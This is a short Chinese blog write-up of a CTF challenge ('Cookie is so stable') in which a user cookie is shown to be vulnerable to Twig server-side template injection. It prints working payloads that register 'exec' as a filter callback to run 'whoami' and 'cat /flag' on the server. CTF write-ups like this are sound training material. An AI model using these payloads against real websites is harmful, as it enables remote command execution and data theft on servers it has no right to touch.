BUUCTF[BJDCTF2020]Cookie is so stable 1

考点:

SSTI注入

进入靶场

 

 查看hint.php的源代码:

 发现让我们留意cookie。

给flag.php页面进行复制,并抓包

 传入参数,发现并没有传入,抓取穿后的页面

 发现cookie处多了user=admin,并成功显示。

猜测为SSTI注入

尝试{{8*8}},不抓包,直接测试

证明为SSTI注入;

SSTI(模板注入)漏洞(入门篇) - bmjoker - 博客园 (cnblogs.com)

写入语法:

user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}

 读取flag

user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

 得到flag。

 

posted @ 2021-12-04 21:58  LoYoHo00  阅读(402)  评论(0)    收藏  举报
levels of contents